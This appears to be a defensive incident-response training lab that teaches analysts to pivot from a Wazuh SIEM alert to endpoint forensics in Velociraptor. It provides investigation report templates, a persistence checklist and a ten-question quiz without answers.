What You'll Learn
- Pivot from a Wazuh SIEM alert to endpoint investigation using Velociraptor
- Correlate SIEM alert data (rule ID, agent, source IP, timestamp) with live endpoint forensics
- Collect process details, dropped files, and network connections from the alerted host
- Build a complete incident narrative connecting the SIEM detection to endpoint evidence
- Produce an investigation report that answers "Here's what happened on the endpoint"
Lab Overview
| Detail | Value |
|---|---|
| Lab Profile | lab-wazuh-velo |
| Containers | Wazuh Manager, Wazuh Indexer, Wazuh Dashboard, Velociraptor Server, Velociraptor Client |
| Estimated Time | 65 minutes |
| Difficulty | Advanced |
| Browser Access | Wazuh Dashboard (Web UI) + Velociraptor GUI (port 8889) |
| Pre-Loaded Data | Wazuh alerts for suspicious process + corresponding endpoint artifacts |
| Deliverable | "Here's what happened on the endpoint" investigation report |
Why SIEM-to-Endpoint Matters. A SIEM alert says "something suspicious happened." But alerts are just the starting point — they tell you WHAT was detected, not the full story. To understand the impact, scope, and timeline of an incident, you must pivot from the alert to the endpoint. This lab teaches the most critical workflow in modern SOC operations: SIEM detection → endpoint investigation → complete incident picture.
The Scenario
Your Wazuh dashboard shows a high-severity alert: suspicious process execution on a monitored host. The alert triggered on a rule that detects unusual command execution patterns. Your job is to:
- Analyze the Wazuh alert to extract initial indicators (what, where, when)
- Pivot to Velociraptor to investigate the endpoint in depth
- Collect forensic data (processes, files, network connections)
- Build the complete picture of what happened on the endpoint
- Write the investigation report connecting SIEM data to endpoint evidence
This is a two-tool investigation — you'll work across both Wazuh and Velociraptor throughout the lab.
Part 1: SIEM Alert Analysis (Wazuh)
Step 1: Access Wazuh Dashboard
Open the Wazuh web interface from the "Open Lab" button. Log in with:
- Username:
admin - Password:
cyberblue
Step 2: Find the Suspicious Alert
Navigate to Security Events and look for high-severity alerts (level 10+). You're looking for alerts related to suspicious process execution.
Record the following from the alert:
SIEM ALERT ANALYSIS
════════════════════
Alert ID: [Wazuh alert ID]
Rule ID: [rule that triggered]
Rule Description: [what the rule detects]
Severity Level: [numeric level]
Timestamp: [when it occurred]
Agent: [which host]
Agent IP: [host IP address]
KEY FIELDS FROM ALERT
─────────────────────
Process/Command: [suspicious process or command observed]
Source User: [user account]
Source IP: [if applicable]
File Path: [if applicable]
Full Log: [raw log entry]
Step 3: Extract Pivot Indicators
From the Wazuh alert, identify the indicators you'll use to investigate on the endpoint:
PIVOT INDICATORS
════════════════
Hostname/IP: [endpoint to investigate in Velociraptor]
Process Name: [what to look for in process list]
File Path: [what to look for on disk]
User Account: [what user context to focus on]
Timestamp: [when to anchor your investigation]
Extract Before You Pivot. Always document ALL available data from the SIEM alert before switching to Velociraptor. You want specific process names, file paths, user accounts, and timestamps to guide your endpoint investigation. Going to the endpoint without these indicators means searching blindly.
Part 2: Endpoint Investigation (Velociraptor)
Step 4: Access Velociraptor
Open the Velociraptor GUI (port 8889). Log in with:
- Username:
admin - Password:
cyberblue
Step 5: Locate the Alerted Host
Find the host mentioned in the Wazuh alert. Navigate to its client view.
Verify the host matches by confirming:
- Hostname matches the Wazuh agent name
- OS information is consistent
- Client is currently connected (green status)
Step 6: Collect Process Details
Using the process name from the Wazuh alert, collect detailed process information:
- Run
Linux.Sys.Pslistto get the full process listing - Find the suspicious process (or its descendants)
- Record PID, PPID, full command line, user, and path
PROCESS INVESTIGATION
═════════════════════
Alert Process: [process mentioned in Wazuh alert]
Current Status: [still running / terminated]
PID: [process ID]
PPID: [parent process ID]
Full Command Line: [complete command with arguments]
User Context: [running as which user]
Binary Path: [where the executable lives]
Parent Process: [what launched it]
Part 3: Expanding the Investigation
Step 7: Check for Dropped Files
Based on the process details, collect file information for suspicious paths:
- Use Velociraptor to list files in the directories identified from the process investigation
- Look for recently created or modified files
- Check for hidden files and directories
Document any suspicious files found:
DROPPED FILES ANALYSIS
══════════════════════
File 1:
Path: [full path]
Size: [bytes]
Created: [timestamp]
Modified: [timestamp]
Permissions: [rwx]
Owner: [user:group]
Content Type: [script / binary / data]
Hash (if available): [MD5/SHA256]
Step 8: Check Network Connections
Collect network connection data to see if the suspicious process is communicating externally:
- Run
Linux.Sys.Netstatto get current connections - Cross-reference PIDs with your process findings
- Identify any external connections
NETWORK CONNECTION ANALYSIS
═══════════════════════════
Connection 1:
Process: [name] (PID: [x])
Local: [address:port]
Remote: [address:port]
State: [ESTABLISHED/LISTEN/etc]
Direction: [Inbound / Outbound]
Suspicious: [Yes/No — reason]
Step 9: Check for Persistence
Given that the attacker had access, check common persistence locations:
- Cron jobs (
Linux.Sys.Crontab) - Recently modified systemd services
- SSH authorized keys
- Shell configuration files
PERSISTENCE CHECK
═════════════════
Cron: [findings or "Clean"]
Systemd: [findings or "Clean"]
SSH Keys: [findings or "Clean"]
Shell Config: [findings or "Clean"]
Don't Stop at the Alert. The Wazuh alert showed you ONE suspicious event. But once you're on the endpoint, you need to check the FULL scope — what else did the attacker do? Additional processes, files, connections, and persistence mechanisms may exist that Wazuh didn't generate alerts for. The endpoint tells the complete story.
Part 4: Correlating SIEM and Endpoint Data
Step 10: Build the Correlation Table
Connect your Wazuh findings with your Velociraptor findings:
SIEM ↔ ENDPOINT CORRELATION
════════════════════════════
SIEM Alert → Endpoint Evidence
──────────────────────────────────────────────────────────
Rule [ID]: [description] → Process: [name] running from [path]
Agent: [hostname] → Client: [Velociraptor client ID]
Source user: [user] → Process owner: [confirmed user]
Timestamp: [alert time] → Process start: [Velociraptor timestamp]
Suspicious command: [from alert] → Full command line: [from Velociraptor]
ADDITIONAL ENDPOINT FINDINGS (not in SIEM)
──────────────────────────────────────────
1. [Finding not covered by any Wazuh alert]
2. [Finding not covered by any Wazuh alert]
3. [Finding not covered by any Wazuh alert]
Part 5: Investigation Report
Step 11: Write the Final Report
SIEM-TO-ENDPOINT INVESTIGATION REPORT
══════════════════════════════════════
Investigation ID: [your reference number]
Date: [today's date]
Analyst: [your name]
Classification: [Confirmed Incident / False Positive / Inconclusive]
TRIGGER
───────
Wazuh Alert: [rule ID — description]
Severity: [level]
Time: [timestamp]
Host: [agent name / IP]
EXECUTIVE SUMMARY
─────────────────
[2-3 sentences: What happened, how bad is it, what needs to be done]
INVESTIGATION TIMELINE
──────────────────────
[T+0] SIEM alert received — [description]
[T+X] Pivoted to Velociraptor — confirmed [what]
[T+X] Process investigation — found [what]
[T+X] File investigation — discovered [what]
[T+X] Network investigation — identified [what]
[T+X] Persistence check — found [what]
IMPACT ASSESSMENT
─────────────────
Affected Systems: [list]
Data at Risk: [what data could be compromised]
Lateral Movement: [evidence of spreading to other systems?]
Persistence: [mechanisms found — can attacker return?]
EVIDENCE INVENTORY
──────────────────
Source | Evidence Type | Key Finding
──────────────────────────────────────────────────
Wazuh | Alert | [description]
Velociraptor | Process data | [description]
Velociraptor | File data | [description]
Velociraptor | Network data | [description]
Velociraptor | Persistence data | [description]
RECOMMENDATIONS
───────────────
Immediate:
1. [First action to take NOW]
2. [Second immediate action]
Short-term:
3. [Action within 24 hours]
4. [Action within 48 hours]
Long-term:
5. [Prevention measure]
6. [Detection improvement]
Deliverable Checklist
Before completing the lab, ensure you have:
- SIEM Alert Analysis — fully documented the Wazuh alert with all key fields
- Pivot Indicators — extracted hostname, process, file path, user, and timestamp
- Process Investigation — collected and analyzed process details via Velociraptor
- File Investigation — identified dropped files and suspicious content
- Network Investigation — checked for external connections
- Persistence Check — verified cron, systemd, SSH, and shell configs
- Correlation Table — mapped SIEM data to endpoint evidence
- Investigation Report — complete "Here's what happened" narrative
Key Takeaways
- SIEM alerts are the starting point, not the conclusion — always pivot to the endpoint for the full picture
- Extract ALL indicators from the alert before switching tools (hostname, process, path, user, timestamp)
- Endpoint investigation often reveals activity the SIEM missed — additional processes, files, and persistence
- The correlation between SIEM detection and endpoint evidence builds the complete incident narrative
- A good investigation report answers: What happened? How bad is it? Can they come back? What do we do next?
What's Next
Congratulations on completing the Endpoint Visibility labs! You've mastered the core workflow: from endpoint collection, through process tree analysis and persistence hunting, to the critical SIEM-to-endpoint investigation pivot. In Module 9, you'll explore threat intelligence integration with MISP.
Lab Challenge: SIEM to Endpoint
10 questions · 70% to pass
You see a Wazuh alert for suspicious process execution on host 'linux-web-01'. What is the FIRST thing you should do before pivoting to Velociraptor?
The Wazuh alert shows rule.id: 100002 with a suspicious command on agent 'linux-web-01'. In Velociraptor, how do you confirm you're investigating the correct host?
You found the suspicious process via Velociraptor. It matches the Wazuh alert. What should you investigate NEXT?
Your Velociraptor investigation reveals 3 additional suspicious findings that have NO corresponding Wazuh alerts. What does this demonstrate?
You collect network connections via Velociraptor and find the alerted process has an ESTABLISHED connection to 198.51.100.5:443. How does this enhance the Wazuh alert data?
During your persistence check, you find a cron job that wasn't mentioned in any Wazuh alert. Why might Wazuh have missed this?
Your correlation table shows the Wazuh timestamp is 14:32:05 and the Velociraptor process start time is 14:31:58. What does this 7-second gap indicate?
In your investigation report's Impact Assessment, you should evaluate 'Lateral Movement.' Why is this critical?
Your investigation report recommends both 'Immediate' and 'Long-term' actions. Which is an appropriate IMMEDIATE recommendation?
After completing this SIEM-to-Endpoint investigation, what is the KEY advantage of having BOTH Wazuh and Velociraptor in your SOC toolkit?
0/10 answered